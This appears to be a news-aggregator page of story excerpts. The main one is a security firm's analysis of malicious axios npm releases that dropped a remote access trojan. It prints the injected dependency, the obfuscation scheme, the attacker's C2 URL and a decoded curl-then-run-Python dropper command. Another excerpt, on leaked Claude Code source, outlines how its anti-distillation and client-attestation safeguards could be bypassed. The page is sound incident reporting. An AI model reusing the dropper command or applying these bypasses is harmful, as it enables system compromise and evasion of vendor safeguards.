10 interesting stories served every morning and every evening.




1 1,783 shares, 73 trendiness

Malicious Versions Drop Remote Access Trojan

Hijacked main­tainer ac­count used to pub­lish poi­soned ax­ios re­leases in­clud­ing 1.14.1 and 0.30.4. The at­tacker in­jected a hid­den de­pen­dency that drops a cross plat­form RAT. We are ac­tively in­ves­ti­gat­ing and will up­date this post with a full tech­ni­cal analy­sis. StepSecurity hosted a com­mu­nity town hall on this in­ci­dent on April 1st at 10:00 AM PT - YouTube record­ing: https://​youtu.be/​3Hku_svFvosax­ios is the most pop­u­lar JavaScript HTTP client li­brary with over 100 mil­lion weekly down­loads. On March 30, 2026, StepSecurity iden­ti­fied two ma­li­cious ver­sions of the widely used ax­ios HTTP client li­brary pub­lished to npm: ax­ios@1.14.1 and ax­ios@0.30.4. The ma­li­cious ver­sions in­ject a new de­pen­dency, plain-crypto-js@4.2.1, which is never im­ported any­where in the ax­ios source code. Its sole pur­pose is to ex­e­cute a postin­stall script that acts as a cross plat­form re­mote ac­cess tro­jan (RAT) drop­per, tar­get­ing ma­cOS, Windows, and Linux. The drop­per con­tacts a live com­mand and con­trol server and de­liv­ers plat­form spe­cific sec­ond stage pay­loads. After ex­e­cu­tion, the mal­ware deletes it­self and re­places its own pack­age.json with a clean ver­sion to evade foren­sic de­tec­tion.If you have in­stalled ax­ios@1.14.1 or ax­ios@0.30.4, as­sume your sys­tem is com­pro­misedThere are zero lines of ma­li­cious code in­side ax­ios it­self, and that’s ex­actly what makes this at­tack so dan­ger­ous. Both poi­soned re­leases in­ject a fake de­pen­dency, plain-crypto-js@4.2.1, a pack­age never im­ported any­where in the ax­ios source, whose sole pur­pose is to run a postin­stall script that de­ploys a cross-plat­form re­mote ac­cess tro­jan. The drop­per con­tacts a live com­mand-and-con­trol server, de­liv­ers sep­a­rate sec­ond-stage pay­loads for ma­cOS, Windows, and Linux, then erases it­self and re­places its own pack­age.json with a clean de­coy. A de­vel­oper who in­spects their node_­mod­ules folder af­ter the fact will find no in­di­ca­tion any­thing went wrong.This was not op­por­tunis­tic. It was pre­ci­sion. The ma­li­cious de­pen­dency was staged 18 hours in ad­vance. Three pay­loads were pre-built for three op­er­at­ing sys­tems. Both re­lease branches were poi­soned within 39 min­utes of each other. Every ar­ti­fact was de­signed to self-de­struct. Within two sec­onds of npm in­stall, the mal­ware was al­ready call­ing home to the at­tack­er’s server be­fore npm had even fin­ished re­solv­ing de­pen­den­cies. This is among the most op­er­a­tionally so­phis­ti­cated sup­ply chain at­tacks ever doc­u­mented against a top-10 npm pack­age.These com­pro­mises were de­tected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have re­spon­si­bly dis­closed the is­sue to the pro­ject main­tain­ers.StepSe­cu­rity Harden-Runner, whose com­mu­nity tier is free for pub­lic re­pos and is used by over 12,000 pub­lic repos­i­to­ries, de­tected the com­pro­mised ax­ios pack­age mak­ing anom­alous out­bound con­nec­tions to the at­tack­er’s C2 do­main across mul­ti­ple open source pro­jects. For ex­am­ple, Harden-Runner flagged the C2 call­back to sfr­clak.com:8000 dur­ing a rou­tine CI run in the back­stage repos­i­tory, one of the most widely used de­vel­oper por­tal frame­works. The Backstage team has con­firmed that this work­flow is in­ten­tion­ally sand­boxed and the ma­li­cious pack­age in­stall does not im­pact the pro­ject. The con­nec­tion was au­to­mat­i­cally marked as anom­alous be­cause it had never ap­peared in any prior work­flow run. Harden-Runner in­sights for com­mu­nity tier pro­jects are pub­lic by de­sign, al­low­ing any­one to ver­ify the de­tec­tion: https://​app.stepse­cu­rity.io/​github/​back­stage/​back­stage/​ac­tions/​runs/​23775668703?tab=net­work-events

[Community Webinar] ax­ios Compromised on npm: What We Know, What You Should Do

Watch the StepSecurity com­mu­nity brief­ing on the ax­ios sup­ply chain at­tack. We walk through the full at­tack chain, in­di­ca­tors of com­pro­mise, re­me­di­a­tion steps, and an­swer com­mu­nity ques­tions.

Watch the record­ing on YouTube →

The at­tack was pre-staged across roughly 18 hours, with the ma­li­cious de­pen­dency seeded on npm be­fore the ax­ios re­leases to avoid brand-new pack­age” alarms from se­cu­rity scan­ners:

plain-crypto-js@4.2.0 pub­lished by nr­wise@pro­ton.me — a clean de­coy con­tain­ing a full copy of the le­git­i­mate crypto-js source, no postin­stall hook. Its sole pur­pose is to es­tab­lish npm pub­lish­ing his­tory so the pack­age does not ap­pear as a zero-his­tory ac­count dur­ing later in­spec­tion.

plain-crypto-js@4.2.1 pub­lished by nr­wise@pro­ton.me — ma­li­cious pay­load added. The postin­stall: node setup.js” hook and ob­fus­cated drop­per are in­tro­duced.

ax­ios@1.14.1 pub­lished by com­pro­mised ja­son­saay­man ac­count (email: if­stap@pro­ton.me) — in­jects plain-crypto-js@4.2.1 as a run­time de­pen­dency, tar­get­ing the mod­ern 1.x user base.

ax­ios@0.30.4 pub­lished by the same com­pro­mised ac­count — iden­ti­cal in­jec­tion into the legacy 0.x branch, pub­lished 39 min­utes later to max­i­mize cov­er­age across both re­lease lines.

npm un­pub­lishes ax­ios@1.14.1 and ax­ios@0.30.4. Both ver­sions are re­moved from the reg­istry and the lat­est dist-tag re­verts to 1.14.0. ax­ios@1.14.1 had been live for ap­prox­i­mately 2 hours 53 min­utes; ax­ios@0.30.4 for ap­prox­i­mately 2 hours 15 min­utes. Timestamp is in­ferred from the ax­ios reg­istry doc­u­men­t’s mod­i­fied field (03:15:30Z) — npm does not ex­pose a ded­i­cated per-ver­sion un­pub­lish time­stamp in its pub­lic API.

npm ini­ti­ates a se­cu­rity hold on plain-crypto-js, be­gin­ning the process of re­plac­ing the ma­li­cious pack­age with an npm se­cu­rity-holder stub.

npm pub­lishes the se­cu­rity-holder stub plain-crypto-js@0.0.1-se­cu­rity.0 un­der the npm@npmjs.com ac­count, for­mally re­plac­ing the ma­li­cious pack­age on the reg­istry. plain-crypto-js@4.2.1 had been live for ap­prox­i­mately 4 hours 27 min­utes. Attempting to in­stall any ver­sion of plain-crypto-js now re­turns the se­cu­rity no­tice.

The at­tacker com­pro­mised the ja­son­saay­man npm ac­count, the pri­mary main­tainer of the ax­ios pro­ject. The ac­coun­t’s reg­is­tered email was changed to if­stap@pro­ton.me — an at­tacker-con­trolled ProtonMail ad­dress. Using this ac­cess, the at­tacker pub­lished ma­li­cious builds across both the 1.x and 0.x re­lease branches si­mul­ta­ne­ously, max­i­miz­ing the num­ber of pro­jects ex­posed.Both ax­ios@1.14.1 and ax­ios@0.30.4 are recorded in the npm reg­istry as pub­lished by ja­son­saay­man, mak­ing them in­dis­tin­guish­able from le­git­i­mate re­leases at a glance. Both ver­sions were pub­lished us­ing the com­pro­mised npm cre­den­tials of a lead ax­ios main­tainer, by­pass­ing the pro­jec­t’s nor­mal GitHub Actions CI/CD pipeline.A crit­i­cal foren­sic sig­nal is vis­i­ble in the npm reg­istry meta­data. Every le­git­i­mate ax­ios 1.x re­lease is pub­lished via GitHub Actions with npm’s OIDC Trusted Publisher mech­a­nism, mean­ing the pub­lish is cryp­to­graph­i­cally tied to a ver­i­fied GitHub Actions work­flow. ax­ios@1.14.1 breaks that pat­tern en­tirely — pub­lished man­u­ally via a stolen npm ac­cess to­ken with no OIDC bind­ing and no git­Head:// ax­ios@1.14.0 — LEGITIMATE

_npmUser”: {

name”: GitHub Actions”,

email”: npm-oidc-no-re­ply@github.com,

trustedPublisher”: {

id”: github”,

oidcConfigId”: oidc:9061ef30-3132-49f4-b28c-9338d192a1a9″

// ax­ios@1.14.1 — MALICIOUS

_npmUser”: {

name”: jasonsaayman”,

email”: if­stap@pro­ton.me

// no trust­ed­Pub­lisher, no git­Head, no cor­re­spond­ing GitHub com­mit or tag

}There is no com­mit or tag in the ax­ios GitHub repos­i­tory that cor­re­sponds to 1.14.1. The re­lease ex­ists only on npm. The OIDC to­ken that le­git­i­mate re­leases use is ephemeral and scoped to the spe­cific work­flow — it can­not be stolen. The at­tacker must have ob­tained a long-lived clas­sic npm ac­cess to­ken for the ac­count.Be­fore pub­lish­ing the ma­li­cious ax­ios ver­sions, the at­tacker pre-staged plain-crypto-js@4.2.1 from ac­count nr­wise@pro­ton.me. This pack­age:Mas­quer­ades as crypto-js with an iden­ti­cal de­scrip­tion and repos­i­tory URL point­ing to the le­git­i­mate brix/​crypto-js GitHub repos­i­to­ryCon­tains postinstall”: node setup.js” — the hook that fires the RAT drop­per on in­stall­Pre-stages a clean pack­age.json stub in a file named pack­age.md for ev­i­dence de­struc­tion af­ter ex­e­cu­tion­The de­coy ver­sion (4.2.0) was pub­lished 18 hours ear­lier to es­tab­lish pub­lish­ing his­tory - a clean pack­age in the reg­istry that makes nr­wise look like a le­git­i­mate main­tainer.What changed be­tween 4.2.0 (decoy) and 4.2.1 (malicious)A com­plete file-level com­par­i­son be­tween plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 re­veals ex­actly three dif­fer­ences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is iden­ti­cal be­tween the two ver­sions:

The 56 crypto source files are not just sim­i­lar; they are bit-for-bit iden­ti­cal to the cor­re­spond­ing files in the le­git­i­mate crypto-js@4.2.0 pack­age pub­lished by Evan Vosberg. The at­tacker made no mod­i­fi­ca­tions to the cryp­to­graphic li­brary code what­so­ever. This was in­ten­tional: any diff-based analy­sis com­par­ing plain-crypto-js against crypto-js would find noth­ing sus­pi­cious in the li­brary files and would fo­cus at­ten­tion on pack­age.json — where the postin­stall hook looks, at a glance, like a stan­dard build or setup task.The anti-foren­sics stub (package.md) de­serves par­tic­u­lar at­ten­tion. After setup.js runs, it re­names pack­age.md to pack­age.json. The stub re­ports ver­sion 4.2.0 — not 4.2.1:// Contents of pack­age.md (the clean re­place­ment stub)

name”: plain-crypto-js”,

version”: 4.2.0″, // ← re­ports 4.2.0, not 4.2.1 — de­lib­er­ate mis­match

description”: JavaScript li­brary of crypto stan­dards.”,

license”: MIT,

author”: { name”: Evan Vosberg”, url”: http://​github.com/​evan­vos­berg },

homepage”: http://​github.com/​brix/​crypto-js,

repository”: { type”: git”, url”: http://​github.com/​brix/​crypto-js.git },

main”: index.js”,

// No scripts” key — no postin­stall, no test

dependencies”: {}

}This cre­ates a sec­ondary de­cep­tion layer. After in­fec­tion, run­ning npm list in the pro­ject di­rec­tory will re­port plain-crypto-js@4.2.0 — be­cause npm list reads the ver­sion field from the in­stalled pack­age.json, which now says 4.2.0. An in­ci­dent re­spon­der check­ing in­stalled pack­ages would see a ver­sion num­ber that does not match the ma­li­cious 4.2.1 ver­sion they were told to look for, po­ten­tially lead­ing them to con­clude the sys­tem was not com­pro­mised.# What npm list re­ports POST-infection (after the pack­age.json swap):

$ npm list plain-crypto-js

mypro­ject@1.0.0

└── plain-crypto-js@4.2.0 # ← re­ports 4.2.0, not 4.2.1

# but the drop­per al­ready ran as 4.2.1

# The re­li­able check is the DIRECTORY PRESENCE, not the ver­sion num­ber:

$ ls node_­mod­ules/​plain-crypto-js

aes.js ci­pher-core.js core.js …

# If this di­rec­tory ex­ists at all, the drop­per ran.

# plain-crypto-js is not a de­pen­dency of ANY le­git­i­mate ax­ios ver­sion.The dif­fer­ence be­tween the real crypto-js@4.2.0 and the ma­li­cious plain-crypto-js@4.2.1 is a sin­gle field in pack­age.json:// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)

name”: crypto-js”,

version”: 4.2.0″,

description”: JavaScript li­brary of crypto stan­dards.”,

author”: Evan Vosberg”,

homepage”: http://​github.com/​brix/​crypto-js,

scripts”: {

test”: grunt” // ← no postin­stall

// plain-crypto-js@4.2.1 (MALICIOUSnr­wise@pro­ton.me)

name”: plain-crypto-js”, // ← dif­fer­ent name, every­thing else cloned

version”: 4.2.1″, // ← ver­sion one ahead of the real pack­age

description”: JavaScript li­brary of crypto stan­dards.”,

author”: { name”: Evan Vosberg” }, // ← fraud­u­lent use of real au­thor name

homepage”: http://​github.com/​brix/​crypto-js, // ← real repo, wrong pack­age

scripts”: {

test”: grunt”,

postinstall”: node setup.js” // ← THE ONLY DIFFERENCE. The en­tire weapon.

}The at­tacker pub­lished ax­ios@1.14.1 and ax­ios@0.30.4 with plain-crypto-js: ^4.2.1” added as a run­time de­pen­dency — a pack­age that has never ap­peared in any le­git­i­mate ax­ios re­lease. The diff is sur­gi­cal: every other de­pen­dency is iden­ti­cal to the prior clean ver­sion.When a de­vel­oper runs npm in­stall ax­ios@1.14.1, npm re­solves the de­pen­dency tree and in­stalls plain-crypto-js@4.2.1 au­to­mat­i­cally. npm then ex­e­cutes plain-crypto-js’s postin­stall script, launch­ing the drop­per.Phan­tom de­pen­dency: A grep across all 86 files in ax­ios@1.14.1 con­firms that plain-crypto-js is never im­ported or re­quire()’d any­where in the ax­ios source code. It is added to pack­age.json only to trig­ger the postin­stall hook. A de­pen­dency that ap­pears in the man­i­fest but has zero us­age in the code­base is a high-con­fi­dence in­di­ca­tor of a com­pro­mised re­lease.The Surgical Precision of the InjectionA com­plete bi­nary diff be­tween ax­ios@1.14.0 and ax­ios@1.14.1 across all 86 files (excluding source maps) re­veals that ex­actly one file changed: pack­age.json. Every other file — all 85 li­brary source files, type de­f­i­n­i­tions, README, CHANGELOG, and com­piled dist bun­dles — is bit-for-bit iden­ti­cal be­tween the two ver­sions.# File diff: ax­ios@1.14.0 vs ax­ios@1.14.1 (86 files, source maps ex­cluded)

DIFFERS: pack­age.json

Total dif­fer­ing files: 1

Files only in 1.14.1: (none)

Files only in 1.14.0: (none)# –- ax­ios/​pack­age.json (1.14.0)

# +++ ax­ios/​pack­age.json (1.14.1)

- version”: 1.14.0″,

+ version”: 1.14.1″,

scripts”: {

fix”: eslint –fix lib/**/*.​js”,

- prepare”: husky”

dependencies”: {

follow-redirects”: ^2.1.0″,

form-data”: ^4.0.1″,

proxy-from-env”: ^2.1.0″,

+ plain-crypto-js”: ^4.2.1″

}Two changes are vis­i­ble: the ver­sion bump (1.14.0 → 1.14.1) and the ad­di­tion of plain-crypto-js. There is also a third, less ob­vi­ous change: the prepare”: husky” script was re­moved. husky is the git hook man­ager used by the ax­ios pro­ject to en­force pre-com­mit checks. Its re­moval from the scripts sec­tion is con­sis­tent with a man­ual pub­lish that by­passed the nor­mal de­vel­op­ment work­flow — the at­tacker edited pack­age.json di­rectly with­out go­ing through the pro­jec­t’s stan­dard re­lease tool­ing, which would have re-added the husky pre­pare script.The same analy­sis ap­plies to ax­ios@0.30.3 → ax­ios@0.30.4:# –- ax­ios/​pack­age.json (0.30.3)

# +++ ax­ios/​pack­age.json (0.30.4)

- version”: 0.30.3″,

+ version”: 0.30.4″,

dependencies”: {

follow-redirects”: ^1.15.4″,

form-data”: ^4.0.4″,

proxy-from-env”: ^1.1.0″,

+ plain-crypto-js”: ^4.2.1″

}Again — ex­actly one sub­stan­tive change: the ma­li­cious de­pen­dency in­jec­tion. The ver­sion bump it­self (from 0.30.3 to 0.30.4) is sim­ply the re­quired npm ver­sion in­cre­ment to pub­lish a new re­lease; it car­ries no func­tional sig­nif­i­cance.setup.js is a sin­gle mini­fied file em­ploy­ing a two-layer ob­fus­ca­tion scheme de­signed to evade sta­tic analy­sis tools and con­fuse hu­man re­view­ers.All sen­si­tive strings — mod­ule names, OS iden­ti­fiers, shell com­mands, the C2 URL, and file paths — are stored as en­coded val­ues in an ar­ray named stq[]. Two func­tions de­code them at run­time:_tran­s_1(x, r) — XOR ci­pher. The key OrDeR_7077” is parsed through JavaScript’s Number(): al­pha­betic char­ac­ters pro­duce NaN, which in bit­wise op­er­a­tions be­comes 0. Only the dig­its 7, 0, 7, 7 in po­si­tions 6–9 sur­vive, giv­ing an ef­fec­tive key of [0,0,0,0,0,0,7,0,7,7]. Each char­ac­ter at po­si­tion r is de­coded as:char­Code XOR key[(7 × r × r) % 10] XOR 333_trans_2(x, r) — Outer layer. Reverses the en­coded string, re­places _ with =, base64-de­codes the re­sult (interpreting the bytes as UTF-8 to re­cover Unicode code points), then passes the out­put through _trans_1.The drop­per’s en­try point is _entry(“6202033″), where 6202033 is the C2 URL path seg­ment. The full C2 URL is: http://​sfr­clak.com:8000/​6202033StepSe­cu­rity fully de­coded every en­try in the stq[] ar­ray. The re­cov­ered plain­text re­veals the com­plete at­tack:stq[0] → child_process” // shell ex­e­cu­tion

stq[1] → os” // plat­form de­tec­tion

stq[2] → fs” // filesys­tem op­er­a­tions

stq[3] → http://​sfr­clak.com:8000/ // C2 base URL

stq[5] → win32” // Windows plat­form iden­ti­fier

stq[6] → darwin” // ma­cOS plat­form iden­ti­fier

stq[12] → curl -o /tmp/ld.py -d pack­ages.npm.org/​pro­duct2 -s SCR_LINK && no­hup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &”

stq[13] → package.json” // deleted af­ter ex­e­cu­tion

stq[14] → package.md” // clean stub re­named to pack­age.json

stq[15] → .exe”

stq[16] → .ps1″

stq[17] → .vbs”The com­plete at­tack path from npm in­stall to C2 con­tact and cleanup, across all three tar­get plat­forms.With all strings de­coded, the drop­per’s full logic can be re­con­structed and an­no­tated. The fol­low­ing is a de-ob­fus­cated, com­mented ver­sion of the _entry() func­tion that con­sti­tutes the en­tire drop­per pay­load. Original vari­able names are pre­served; com­ments are added for clar­ity.// setup.js — de-ob­fus­cated and an­no­tated

// SHA-256: e10b1­fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

...

Read the original on www.stepsecurity.io »

2 1,482 shares, 58 trendiness

copilot edited an ad into my pr

After a team mem­ber sum­moned Copilot to cor­rect a typo in a PR of mine, Copilot edited my PR de­scrip­tion to in­clude and ad for it­self and Raycast.

This is hor­rific. I knew this kind of bull­shit would hap­pen even­tu­ally, but I did­n’t ex­pect it so soon.

Here is how plat­forms die: first, they are good to their users; then they abuse their users to make things bet­ter for their busi­ness cus­tomers; fi­nally, they abuse those busi­ness cus­tomers to claw back all the value for them­selves. Then, they die.

...

Read the original on notes.zachmanson.com »

3 1,318 shares, 54 trendiness

fake tools, frustration regexes, undercover mode, and more

Update: see HN dis­cus­sions about this post: https://​news.ycombi­na­tor.com/​item?id=47586778

I use Claude Code daily, so when Chaofan Shou no­ticed ear­lier to­day that Anthropic had shipped a .map file along­side their Claude Code npm pack­age, one con­tain­ing the full, read­able source code of the CLI tool, I im­me­di­ately wanted to look in­side. The pack­age has since been pulled, but not be­fore the code was widely mir­rored, in­clud­ing my­self and picked apart on Hacker News.

This is Anthropic’s sec­ond ac­ci­den­tal ex­po­sure in a week (the model spec leak was just days ago), and some peo­ple on Twitter are start­ing to won­der if some­one in­side is do­ing this on pur­pose. Probably not, but it’s a bad look ei­ther way. The tim­ing is hard to ig­nore: just ten days ago, Anthropic sent le­gal threats to OpenCode, forc­ing them to re­move built-in Claude au­then­ti­ca­tion be­cause third-party tools were us­ing Claude Code’s in­ter­nal APIs to ac­cess Opus at sub­scrip­tion rates in­stead of pay-per-to­ken pric­ing. That whole saga makes some of the find­ings be­low more pointed.

So I spent my morn­ing read­ing through the HN com­ments and leaked source. Here’s what I found, roughly or­dered by how spicy” I thought it was.

In claude.ts (line 301-313), there’s a flag called ANTI_DISTILLATION_CC. When en­abled, Claude Code sends an­ti_dis­til­la­tion: [‘fake_tools’] in its API re­quests. This tells the server to silently in­ject de­coy tool de­f­i­n­i­tions into the sys­tem prompt.

The idea: if some­one is record­ing Claude Code’s API traf­fic to train a com­pet­ing model, the fake tools pol­lute that train­ing data. It’s gated be­hind a GrowthBook fea­ture flag (tengu_anti_distill_fake_tool_injection) and only ac­tive for first-party CLI ses­sions.

This was one of the first things peo­ple no­ticed on HN.

There’s also a sec­ond anti-dis­til­la­tion mech­a­nism in be­tas.ts (lines 279-298), server-side con­nec­tor-text sum­ma­riza­tion. When en­abled, the API buffers the as­sis­tan­t’s text be­tween tool calls, sum­ma­rizes it, and re­turns the sum­mary with a cryp­to­graphic sig­na­ture. On sub­se­quent turns, the orig­i­nal text can be re­stored from the sig­na­ture. If you’re record­ing API traf­fic, you only get the sum­maries, not the full rea­son­ing chain.

How hard would it be to work around these? Not very. Looking at the ac­ti­va­tion logic in claude.ts, the fake tools in­jec­tion re­quires all four con­di­tions to be true: the ANTI_DISTILLATION_CC com­pile-time flag, the cli en­try­point, a first-party API provider, and the ten­gu_an­ti_dis­til­l_­fake_­tool_in­jec­tion GrowthBook flag re­turn­ing true. A MITM proxy that strips the an­ti_dis­til­la­tion field from re­quest bod­ies be­fore they reach the API would by­pass it en­tirely, since the in­jec­tion is server-side and opt-in. The should­In­clude­First­Par­ty­Only­Be­tas() func­tion also checks for CLAUDE_CODE_DISABLE_EXPERIMENTAL_BETAS, so set­ting that env var to a truthy value dis­ables the whole thing. And if you’re us­ing a third-party API provider or the SDK en­try­point in­stead of the CLI, the check never fires at all. The con­nec­tor-text sum­ma­riza­tion is even more nar­rowly scoped, Anthropic-internal-only (USER_TYPE === ant’), so ex­ter­nal users won’t en­counter it re­gard­less.

Anyone se­ri­ous about dis­till­ing from Claude Code traf­fic would find the workarounds in about an hour of read­ing the source. The real pro­tec­tion is prob­a­bly le­gal, not tech­ni­cal.

The file un­der­cover.ts (about 90 lines) im­ple­ments a mode that strips all traces of Anthropic in­ter­nals when Claude Code is used in non-in­ter­nal re­pos. It in­structs the model to never men­tion in­ter­nal co­de­names like Capybara” or Tengu,” in­ter­nal Slack chan­nels, repo names, or the phrase Claude Code” it­self.

There is NO force-OFF. This guards against model co­de­name leaks.”

You can force it ON with CLAUDE_CODE_UNDERCOVER=1, but there’s no way to force it off. In ex­ter­nal builds, the en­tire func­tion gets dead-code-elim­i­nated to triv­ial re­turns. This is a one-way door.

This means AI-authored com­mits and PRs from Anthropic em­ploy­ees in open source pro­jects will have no in­di­ca­tion that an AI wrote them. Hiding in­ter­nal co­de­names is rea­son­able. Having the AI ac­tively pre­tend to be hu­man is a dif­fer­ent thing.

An LLM com­pany us­ing regexes for sen­ti­ment analy­sis is peak irony, but also: a regex is faster and cheaper than an LLM in­fer­ence call just to check if some­one is swear­ing at your tool.

In sys­tem.ts (lines 59-95), API re­quests in­clude a cch=00000 place­holder. Before the re­quest leaves the process, Bun’s na­tive HTTP stack (written in Zig) over­writes those five ze­ros with a com­puted hash. The server then val­i­dates the hash to con­firm the re­quest came from a real Claude Code bi­nary, not a spoofed one.

They use a place­holder of the same length so the re­place­ment does­n’t change the Content-Length header or re­quire buffer re­al­lo­ca­tion. The com­pu­ta­tion hap­pens be­low the JavaScript run­time, so it’s in­vis­i­ble to any­thing run­ning in the JS layer. It’s ba­si­cally DRM for API calls, im­ple­mented at the HTTP trans­port level.

This is the tech­ni­cal en­force­ment be­hind the OpenCode le­gal fight. Anthropic does­n’t just ask third-party tools not to use their APIs; the bi­nary it­self cryp­to­graph­i­cally proves it’s the real Claude Code client. If you’re won­der­ing why the OpenCode com­mu­nity had to re­sort to ses­sion-stitch­ing hacks and auth plu­g­ins af­ter Anthropic’s le­gal no­tice, this is why.

The at­tes­ta­tion is­n’t air­tight, though. The whole mech­a­nism is gated be­hind a com­pile-time fea­ture flag (NATIVE_CLIENT_ATTESTATION), and the cch=00000 place­holder only gets in­jected into the x-an­thropic-billing-header when that flag is on. The header it­self can be dis­abled en­tirely by set­ting CLAUDE_CODE_ATTRIBUTION_HEADER to a falsy value, or re­motely via a GrowthBook kill­switch (tengu_attribution_header). The Zig-level hash re­place­ment also only works in­side the of­fi­cial Bun bi­nary. If you re­built the JS bun­dle and ran it on stock Bun (or Node), the place­holder would sur­vive as-is: five lit­eral ze­ros hit­ting the server. Whether the server re­jects that out­right or just logs it is an open ques­tion, but the code com­ment ref­er­ences a server-side _parse_cc_header func­tion that tolerates un­known ex­tra fields,” which sug­gests the val­i­da­tion might be more for­giv­ing than you’d ex­pect for a DRM-like sys­tem. Not a push-but­ton by­pass, but not the kind of thing that would stop a de­ter­mined third-party client for long ei­ther.

BQ 2026-03-10: 1,279 ses­sions had 50+ con­sec­u­tive fail­ures (up to 3,272) in a sin­gle ses­sion, wast­ing ~250K API calls/​day glob­ally.”

The fix? MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3. After 3 con­sec­u­tive fail­ures, com­paction is dis­abled for the rest of the ses­sion. Three lines of code to stop burn­ing a quar­ter mil­lion API calls a day.

Throughout the code­base, there are ref­er­ences to a fea­ture-gated mode called KAIROS. Based on the code paths in main.tsx, it looks like an un­re­leased au­tonomous agent mode that in­cludes:

This is prob­a­bly the biggest prod­uct roadmap re­veal from the leak.

The im­ple­men­ta­tion is heav­ily gated, so who knows how far along it is. But the scaf­fold­ing for an al­ways-on, back­ground-run­ning agent is there.

Tomorrow is April 1st, and the source con­tains what’s al­most cer­tainly this year’s April Fools’ joke: buddy/​com­pan­ion.ts im­ple­ments a Tamagotchi-style com­pan­ion sys­tem. Every user gets a de­ter­min­is­tic crea­ture (18 species, rar­ity tiers from com­mon to leg­endary, 1% shiny chance, RPG stats like DEBUGGING and SNARK) gen­er­ated from their user ID via a Mulberry32 PRNG. Species names are en­coded with String.fromCharCode() to dodge build-sys­tem grep checks.

The ter­mi­nal ren­der­ing in ink/​screen.ts and ink/​op­ti­mizer.ts bor­rows game-en­gine tech­niques: an Int32Array-backed ASCII char pool, bit­mask-en­coded style meta­data, a patch op­ti­mizer that merges cur­sor moves and can­cels hide/​show pairs, and a self-evict­ing line-width cache (the source claims ~50x re­duc­tion in string­Width calls dur­ing to­ken stream­ing”). Seems like overkill un­til you re­mem­ber these things stream to­kens one at a time.

Every bash com­mand runs through 23 num­bered se­cu­rity checks in bash­Se­cu­rity.ts: 18 blocked Zsh builtins, de­fense against Zsh equals ex­pan­sion (=curl by­pass­ing per­mis­sion checks for curl), uni­code zero-width space in­jec­tion, IFS null-byte in­jec­tion, and a mal­formed to­ken by­pass found dur­ing HackerOne re­view. I haven’t seen an­other tool with this spe­cific a Zsh threat model.

Prompt cache eco­nom­ics clearly drive a lot of the ar­chi­tec­ture. prompt­Cache­BreakDe­tec­tion.ts tracks 14 cache-break vec­tors, and there are sticky latches” that pre­vent mode tog­gles from bust­ing the cache. One func­tion is an­no­tated DANGEROUS_uncachedSystemPromptSection(). When you’re pay­ing for every to­ken, cache in­val­i­da­tion stops be­ing a com­puter sci­ence joke and be­comes an ac­count­ing prob­lem.

The multi-agent co­or­di­na­tor in co­or­di­na­tor­Mode.ts is in­ter­est­ing be­cause the or­ches­tra­tion al­go­rithm is a prompt, not code. It man­ages worker agents through sys­tem prompt in­struc­tions like Do not rub­ber-stamp weak work” and You must un­der­stand find­ings be­fore di­rect­ing fol­low-up work. Never hand off un­der­stand­ing to an­other worker.”

The code­base also has some rough spots. print.ts is 5,594 lines long with a sin­gle func­tion span­ning 3,167 lines and 12 lev­els of nest­ing. They use Axios for HTTP, which is funny tim­ing given that Axios was just com­pro­mised on npm with ma­li­cious ver­sions drop­ping a re­mote ac­cess tro­jan.

Some peo­ple are down­play­ing this be­cause Google’s Gemini CLI and OpenAI’s Codex are al­ready open source. But those com­pa­nies open-sourced their agent SDK (a toolkit), not the full in­ter­nal wiring of their flag­ship prod­uct.

The real dam­age is­n’t the code. It’s the fea­ture flags. KAIROS, the anti-dis­til­la­tion mech­a­nisms: these are prod­uct roadmap de­tails that com­peti­tors can now see and re­act to. The code can be refac­tored. The strate­gic sur­prise can’t be un-leaked.

And here’s the kicker: Anthropic ac­quired Bun at the end of last year, and Claude Code is built on top of it. A Bun bug (oven-sh/bun#28001), filed on March 11, re­ports that source maps are served in pro­duc­tion mode even though Bun’s own docs say they should be dis­abled. The is­sue is still open. If that’s what caused the leak, then Anthropic’s own tool­chain shipped a known bug that ex­posed their own pro­duc­t’s source code.

As one Twitter re­ply put it: accidentally ship­ping your source map to npm is the kind of mis­take that sounds im­pos­si­ble un­til you re­mem­ber that a sig­nif­i­cant por­tion of the code­base was prob­a­bly writ­ten by the AI you are ship­ping.”

...

Read the original on alex000kim.com »

4 1,279 shares, 49 trendiness

Cancer

I’ve taken agency in the treat­ment of my bone can­cer (osteosarcoma in the T5 ver­te­brae of the up­per spine). After I’ve ran out of stan­dard of care treat­ment op­tions and there were no tri­als avail­able for me I’ve started do­ing: max­i­mum di­ag­nos­tics, cre­ated new treat­ments, started do­ing treat­ments in par­al­lel, and scal­ing this for oth­ers.

Elliot Hershberg wrote a great and ex­ten­sive ar­ti­cle about my can­cer jour­ney.

My can­cer jour­ney deck is em­bed­ded be­low, there also is a record­ing of an OpenAI Forum pre­sen­ta­tion. The com­pa­nies we are build­ing to scale this ap­proach for oth­ers can be found at evenone.ven­tures. Please scroll fur­ther on this page for my data and other in­for­ma­tion.

I think the med­ical in­dus­try can be more pa­tient first, see this great ar­ti­cle by Ruxandra https://​www.writ­in­gruxan­dra­bio.com/​p/​the-bu­reau­cracy-block­ing-the-chance

For my data please see https://​os­teosarc.com/ that in­cludes my treat­ment time­line and a data overview doc with 25TB of pub­licly read­able Google Cloud buck­ets.

Please sub­scribe to my mail­ing list

...

Read the original on sytse.com »

5 1,025 shares, 52 trendiness

Claude Code Unpacked

Stuff that’s in the code but not shipped yet. Feature-flagged, env-gated, or just com­mented out.

A vir­tual pet that lives in your ter­mi­nal. Species and rar­ity are de­rived from your ac­count ID. Persistent mode with mem­ory con­sol­i­da­tion be­tween ses­sions and au­tonomous back­ground ac­tions.Long plan­ning ses­sions on Opus-class mod­els, up to 30-minute ex­e­cu­tion win­dows.Con­trol Claude Code from your phone or a browser. Full re­mote ses­sion with per­mis­sion ap­provals.Run ses­sions in the back­ground with –bgtmuxSessions talk to each other over Unix do­main sock­ets.Be­tween ses­sions, the AI re­views what hap­pened and or­ga­nizes what it learned.

...

Read the original on ccunpacked.dev »

6 964 shares, 39 trendiness

Why So Many Control Rooms Were Seafoam Green

